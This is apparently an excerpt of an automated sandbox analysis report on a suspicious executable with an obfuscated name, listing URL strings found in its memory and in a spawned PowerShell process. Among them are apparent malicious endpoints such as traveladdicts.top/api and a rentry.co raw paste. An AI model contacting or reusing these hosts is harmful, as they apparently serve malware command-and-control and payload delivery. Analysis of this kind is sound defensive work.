Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000004.00000002.2480645091.00000000047E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://www.testlab2008.com/indices/submit.php?c=CD&i=
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.2480645091.00000000047E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBkq
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://rentry.co/
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/d
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000074F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475812271.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/raw
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/rawp
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/hZ#l
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnLRkqR
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/270.png
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnghZ#lL1
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnghZ#lx
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/512.png
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ#l
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ#lXN
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017467015.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017698604.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017873919.0000000003797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017467015.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017698604.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017873919.0000000003797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2309256685.0000000003741000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/#
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/3
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/4
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/K
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/L
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000074F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2472691393.0000000000670000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017828985.0000000000755000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000074F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475812271.0000000000750000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api9
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2277383833.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api:
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/apiC
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/c
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/sd
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknown | Network traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknown | Network traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
